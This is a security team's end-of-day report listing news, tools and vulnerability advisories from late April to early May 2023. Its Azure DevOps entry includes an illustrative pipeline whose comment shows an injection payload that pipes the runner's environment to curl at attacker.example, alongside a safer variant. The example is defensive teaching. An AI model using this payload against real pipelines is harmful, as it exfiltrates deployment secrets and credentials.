End-of-Day report
Timeframe: Friday 28-04-2023 18:00 - Tuesday 02-05-2023 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
News
Hackers target vulnerable Veeam backup servers exposed online
Veeam backup servers are being targeted by at least one group of threat actors known to work with multiple high-profile ransomware gangs.
https://www.bleepingcomputer.com/news/security/hackers-target-vulnerable-veeam-backup-servers-exposed-online/
New LOBSHOT malware gives hackers hidden VNC access to Windows devices
A new malware known as LOBSHOT distributed using Google ads allows threat actors to stealthily take over infected Windows devices using hVNC.
https://www.bleepingcomputer.com/news/security/new-lobshot-malware-gives-hackers-hidden-vnc-access-to-windows-devices/
Researchers Uncover New BGP Flaws in Popular Internet Routing Protocol Software
Cybersecurity researchers have uncovered weaknesses in a software implementation of the Border Gateway Protocol (BGP) that could be weaponized to achieve a denial-of-service (DoS) condition on vulnerable BGP peers.
https://thehackernews.com/2023/05/researchers-uncover-new-bgp-flaws-in.html
trawler: Dredging Windows for Persistence
Trawler is a PowerShell script designed to help Incident Responders discover potential indicators of compromise on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.
https://github.com/joeavanzato/Trawler
Attacks on vulnerabilities in TP-Link Archer, Apache Log4j2 and Oracle WebLogic
Attackers are exploiting security vulnerabilities in TP-Link Archer, Apache Log4j2 and Oracle WebLogic to gain access to victims' networks.
https://heise.de/-8984237
Medical devices: warning of a critical security vulnerability in Illumina software
The US cyber-security agency CISA warns of critical security vulnerabilities in Illumina's medical devices. Attackers could take control of them.
https://heise.de/-8983960
Exploitation of 5-Year-Old TBK DVR Vulnerability Spikes
Fortinet warns of a massive spike in malicious attacks targeting a five-year-old authentication bypass vulnerability in TBK DVR devices.
https://www.securityweek.com/exploitation-of-5-year-old-tbk-dvr-vulnerability-spikes/
Critical Infrastructure Organizations Urged to Identify Risky Communications Equipment
CISA urges organizations to review the FCC's Covered List of risky communications equipment and incorporate it into their supply chain risk management efforts.
https://www.securityweek.com/critical-infrastructure-organizations-urged-to-identify-risky-communications-equipment/
Webinar: Using online research tools properly
How do I use Google, and other search engines as well, properly? What other research tools and search methods are there? In this webinar we show you what good, efficient online research can look like. Participation is free: Tuesday 9 May 2023, 18:30 - 20:00 via Zoom.
https://www.watchlist-internet.at/news/webinar-recherchetools-im-internet-richtig-nutzen/
Online shopping: do not pay with the PayPal option "Send money to a friend"
Fake shops have recently begun abusing the PayPal option "Send money to friends and family". The criminals behind the fake shops create PayPal.Me payment links. With a few small tweaks by the criminals, the purchase amount is pre-filled there and the payment type "Send money to a friend" is preselected. If you pay with this payment type, buyer protection does not apply. Your money is then gone and cannot be recovered.
https://www.watchlist-internet.at/news/online-shopping-bezahlen-sie-nicht-mit-der-paypal-funktion-geld-an-einen-freund-senden/
Apple releases "Rapid Security Response" for iOS, iPadOS and macOS
The new update method shortens the installation process considerably. With Rapid Security Responses, Apple intends in future to eliminate threats such as zero-day vulnerabilities more quickly.
https://www.zdnet.de/88408872/apple-veroeffentlicht-schnelle-sicherheitsmassnahme-fuer-ios-ipados-und-macos/
Enforce Zero Trust in Microsoft 365 - Part 1: Setting the basics
This first blog post is part of a series of blog posts related to the implementation of Zero Trust approach in Microsoft 365. This series will first cover the basics and then deep dive into the different features such as Azure Active Directory (Azure AD) Conditional Access policies, Microsoft Defender for Cloud Apps policies, Information Protection and Microsoft Endpoint Manager, to only cite a few.
https://blog.nviso.eu/2023/05/02/enforce-zero-trust-in-microsoft-365-part-1-setting-the-basics/
CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers
AhnLab Security Emergency response Center (ASEC) has recently discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers.
https://asec.ahnlab.com/en/51908/
A LNK Between Browsers: Hunting Methodologies and Extension Abusing Actors
Two pillars in sleight of hand magic are User Initiated Action, where the target needs to believe their actions are their own, and Hidden Action, the trick needs to be concealed behind something ordinary and nonthreatening. Mandiant became aware of a chain of adversary methodologies that leverage these two pillars to achieve persistence.
https://www.mandiant.com/resources/blog/lnk-between-browsers
Vulnerabilities
Wireshark 4.0.5 Released, (Sat, Apr 29th)
Wireshark version 4.0.5 was released with 11 bugs and 3 vulnerabilities fixed.
https://isc.sans.edu/diary/rss/29790
Azure DevOps CICD Pipelines - Command Injection with Parameters, Variables and a discussion on Runner hijacking
This article discusses a vulnerability in Azure DevOps that can be exploited by users able to run pipelines with user-controlled variables. The vulnerability allows malicious users with access to edit runtime parameter values to inject shell commands that execute on the pipeline runner. This can compromise the runner and expose sensitive information such as secrets used for deployments and Azure service principal credentials.
https://pulsesecurity.co.nz/advisories/Azure-Devops-Command-Injection
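As an added illustration of the mechanism the advisory describes (a pipeline written for this report, not Pulse Security's proof of concept; the parameter name buildTag, the host attacker.example and the payload are assumptions), the following pipeline shows a runtime parameter expanded straight into a script step beside the hardened form:

```yaml
# Runtime parameters: anyone allowed to queue this pipeline can set them at run time.
parameters:
  - name: buildTag          # assumed parameter name for this illustration
    displayName: Build tag
    type: string
    default: 'v1.0.0'

trigger: none

pool:
  vmImage: ubuntu-latest

steps:
  # VULNERABLE: ${{ }} is a compile-time template expression. Its value is pasted
  # verbatim into the script body before bash ever starts, so a parameter value
  # such as (illustrative payload)
  #   v1.0.0"; env | curl -T - https://attacker.example/ ; echo "
  # closes the quote and runs arbitrary commands with the runner's environment,
  # including any secrets mapped into that step.
  - script: |
      echo "Building tag: ${{ parameters.buildTag }}"
    displayName: Unsafe (template expansion into shell)

  # SAFER: hand the value to the step as an environment variable and read it as an
  # ordinary shell variable. The value stays data and is never re-parsed as code.
  - script: |
      echo "Building tag: $BUILD_TAG"
    displayName: Safe (value passed via env and quoted)
    env:
      BUILD_TAG: ${{ parameters.buildTag }}
```

Template expressions (`${{ }}`) and macro variables (`$(name)`) are both substituted as text before the shell runs, so quoting inside the script does not protect the unsafe form; only the `env:` mapping does. Where the set of acceptable inputs is known in advance, additionally restrict the parameter with a `values:` list so the server rejects anything else at queue time, and treat the runner's identity (service connections, service principal credentials) as compromised if such a pipeline was ever run with untrusted input.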
Security updates for Monday
Security updates have been issued by Debian (distro-info-data, ffmpeg, jackson-databind, jruby, libapache2-mod-auth-openidc, libxml2, openvswitch, sniproxy, and wireshark), Fedora (git, libsignal-protocol-c, php-nyholm-psr7, python-setuptools, rust-askama, rust-askama_shared, rust-comrak, thunderbird, and webkitgtk), SUSE (git, glib2, shadow, thunderbird, and webkit2gtk3), and Ubuntu (Apache Commons Net, git, linux-azure-5.15, linux-azure-fde, linux-kvm, linux-ibm-5.4, linux-snapdragon, netty, and ZenLib).
https://lwn.net/Articles/930588/
Security updates for Tuesday
Security updates have been issued by Debian (libdatetime-timezone-perl and tzdata), Fedora (chromium), Red Hat (emacs and libwebp), Slackware (netatalk), and Ubuntu (php7.0).
https://lwn.net/Articles/930649/
IBM Security Bulletins 2023-04-28 - 2023-05-02
IBM Engineering Test Management, IBM Spectrum Scale, IBM DataPower Gateway, IBM i, Rational ClearQuest, IBM Business Automation Workflow, IBM Business Automation Workflow Enterprise Service Bus, IBM Case Manager, BladeCenter, PureFlex System and Flex System, System x, IBM Maximo, IBM Control Desk, Db2 for Linux, UNIX and Windows, IBM Robotic Process Automation, Tivoli Business Service Manager, Content Manager Client, IBM Sterling Secure Proxy, IBM App Connect Enterprise, IBM Security Key Lifecycle Manager, IBM MQ, IBM MQ Appliance, Tivoli Application Dependency Discovery Manager, IBM Cloud Pak, IBM InfoSphere Information, WebSphere Remote Server, IBM Workload Scheduler.
ZDI-23-503: (Pwn2Own) NETGEAR RAX30 logCtrl Command Injection Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-23-503/
ZDI-23-502: (Pwn2Own) NETGEAR RAX30 SOAP Request SQL Injection Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-23-502/
ZDI-23-501: (Pwn2Own) NETGEAR RAX30 Device Configuration Cleartext Storage Information Disclosure Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-23-501/
ZDI-23-496: NETGEAR RAX30 lighttpd Misconfiguration Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-23-496/
ZDI-23-495: NETGEAR RAX30 rex_cgi JSON Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-23-495/
Android Security Bulletin - May 2023
https://source.android.com/docs/security/bulletin/2023-05-01?hl=de
F5: K000133706 : OpenSSL vulnerability CVE-2023-0464
https://my.f5.com/manage/s/article/K000133706
F5: K000133615 : device-mapper-multipath vulnerability CVE-2022-41974
https://my.f5.com/manage/s/article/K000133615
F5: K000133753 : PHP vulnerability CVE-2023-0662
https://my.f5.com/manage/s/article/K000133753
Securing Databricks cluster init scripts
https://sec-consult.com/blog/detail/securing-databricks-cluster-init-scripts/
Vulnerabilities in the Autodesk® 3ds Max® USD plugin
https://www.autodesk.com/trust/security-advisories/adsk-sa-2023-0008
Mitsubishi Electric Factory Automation Products
https://www.cisa.gov/news-events/ics-advisories/icsa-23-122-01
Zyxel security advisory for post-authentication command injection vulnerability in NBG6604 home router
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-vulnerability-in-nbg6604-home-router
Zyxel security advisory for multiple vulnerabilities in NBG-418N v2 home router
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-in-nbg-418n-v2-home-router